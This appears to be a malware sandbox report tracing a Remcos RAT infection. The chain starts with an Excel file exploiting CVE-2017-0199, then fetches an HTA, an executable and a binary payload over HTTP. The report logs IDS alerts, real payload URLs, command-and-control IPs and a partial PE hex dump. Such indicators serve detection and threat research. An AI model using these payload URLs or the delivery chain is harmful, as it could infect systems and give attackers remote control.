          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167

          Networking

          Source: Network traffic | Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 192.3.220.22:80
          Source: Network traffic | Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.220.22:80 -> 192.168.2.22:49164
          Source: Network traffic | Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 192.3.220.22:80
          Source: Network traffic | Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.220.22:80 -> 192.168.2.22:49166
          Source: Network traffic | Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49172 -> 192.3.220.22:80
          Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49174 -> 107.173.4.16:2404
          Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49175 -> 107.173.4.16:2404
          Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 107.173.4.16:2404
          Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Mon, 30 Sep 2024 07:53:33 GMT | Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 | Last-Modified: Sun, 29 Sep 2024 19:50:50 GMT | ETag: "f1e30-6234767b79a80" | Accept-Ranges: bytes | Content-Length: 990768 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/lnk | Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 27 95 75 59 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 64 00 00 00 2a 02 00 00 08 00 00 3d 33 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 90 0c 00 00 04 00 00 37 2f 0f 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 84 00 00 a0 00 00 00 00 c0 05 00 d0 c2 06 00 00 00 00 00 00 00 00 00 98 14 0f 00 98 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6d 62 00 00 00 10 00 00 00 64 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 8e 13 00 00 00 80 00 00 00 14 00 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 
64 61 74 61 00 00 00 18 03 02 00 00 a0 00 00 00 06 00 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 03 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 d0 c2 06 00 00 c0 05 00 00 c4 06 00 00 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
          Source: Joe Sandbox View | IP Address: 107.173.4.16 107.173.4.16
          Source: Joe Sandbox View | IP Address: 178.237.33.50 178.237.33.50
          Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
          Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.22:49173 -> 192.3.220.22:80
          Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49176 -> 178.237.33.50:80
          Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.22:49177 -> 192.3.220.22:80
          Source: global traffic | HTTP traffic detected: GET /2Rxzb3 HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: og1.in | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /2Rxzb3 HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: og1.in | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /2Rxzb3 HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: og1.in | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /2Rxzb3 HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: og1.in | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /xampp/en/cookienetbookinetcahce.hta HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 192.3.220.22 | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /xampp/en/cookienetbookinetcahce.hta HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Range: bytes=8896- | Connection: Keep-Alive | Host: 192.3.220.22 | If-Range: "1ceb2-62345be2e2e61"
          Source: global traffic | HTTP traffic detected: GET /430/dllhost.exe HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 192.3.220.22 | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /xampp/en/cookienetbookinetcahce.hta HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | If-Modified-Since: Sun, 29 Sep 2024 17:51:50 GMT | Connection: Keep-Alive | Host: 192.3.220.22 | If-None-Match: "1ceb2-62345be2e2e61"
          Source: global traffic | HTTP traffic detected: GET /hFXELFSwRHRwqbE214.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: 192.3.220.22 | Cache-Control: no-cache
          Source: global traffic | HTTP traffic detected: GET /hFXELFSwRHRwqbE214.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: 192.3.220.22 | Cache-Control: no-cache
          Source: unknown | TCP traffic detected without corresponding DNS query: 192.3.220.22 (this entry appears 50 times in the report)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE896F7018 URLDownloadToFileW,7_2_000007FE896F7018
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\82C6F378.emf
          Source: global trafficHTTP traffic detected: GET /2Rxzb3 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2Rxzb3 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2Rxzb3 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2Rxzb3 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xampp/en/cookienetbookinetcahce.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.220.22Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xampp/en/cookienetbookinetcahce.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.220.22If-Range: "1ceb2-62345be2e2e61"
          Source: global trafficHTTP traffic detected: GET /430/dllhost.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.220.22Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xampp/en/cookienetbookinetcahce.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Sun, 29 Sep 2024 17:51:50 GMTConnection: Keep-AliveHost: 192.3.220.22If-None-Match: "1ceb2-62345be2e2e61"
          Source: global trafficHTTP traffic detected: GET /hFXELFSwRHRwqbE214.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 192.3.220.22Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /hFXELFSwRHRwqbE214.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 192.3.220.22Cache-Control: no-cache
          Source: Vaccinerende.exeString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
          Source: Vaccinerende.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
          Source: global trafficDNS traffic detected: DNS query: og1.in
          Source: global trafficDNS traffic detected: DNS query: geoplugin.net
          Source: mshta.exe, 00000004.00000002.417244267.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413946521.00000000033BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.22/
          Source: powershell.exe, 00000007.00000002.434786957.0000000002FFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.479817740.0000000002952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.22/430/dllhost.
          Source: powershell.exe, 00000013.00000002.479817740.0000000002952000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.535608601.000000001C286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.22/430/dllhost.exe
          Source: powershell.exe, 00000007.00000002.447277326.000000001A99F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.22/430/dllhost.exe%m
          Source: powershell.exe, 00000007.00000002.434786957.0000000002FFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.479817740.0000000002952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.22/430/dllhost.exep
          Source: mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.22/ic
          Source: mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.22/videro
          Source: mshta.exe, 00000004.00000002.414718403.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.414694836.0000000000465000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003320000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414241682.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413946521.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.460570080.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471733215.0000000003D9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471568642.00000000003CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003E11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003E11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003E11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472196529.0000000003D9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta
          Source: mshta.exe, 00000004.00000002.417244267.0000000003320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta9p
          Source: mshta.exe, 0000000F.00000002.471964740.000000000035A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.459453313.0000000003E3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaC:
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaF
          Source: mshta.exe, 0000000F.00000003.471733215.0000000003DBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472196529.0000000003DBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaMy
          Source: mshta.exe, 00000004.00000002.417244267.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413946521.00000000033BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaP
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaQ
          Source: mshta.exe, 00000004.00000003.414430980.0000000002A05000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.468769729.0000000002D35000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470941601.0000000002D35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.22/xampp/en/cookienetbookinetcahce.htahttp://192.3.220.22/xampp/en/cookienetbookine
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C421000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.447277326.000000001AA4E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
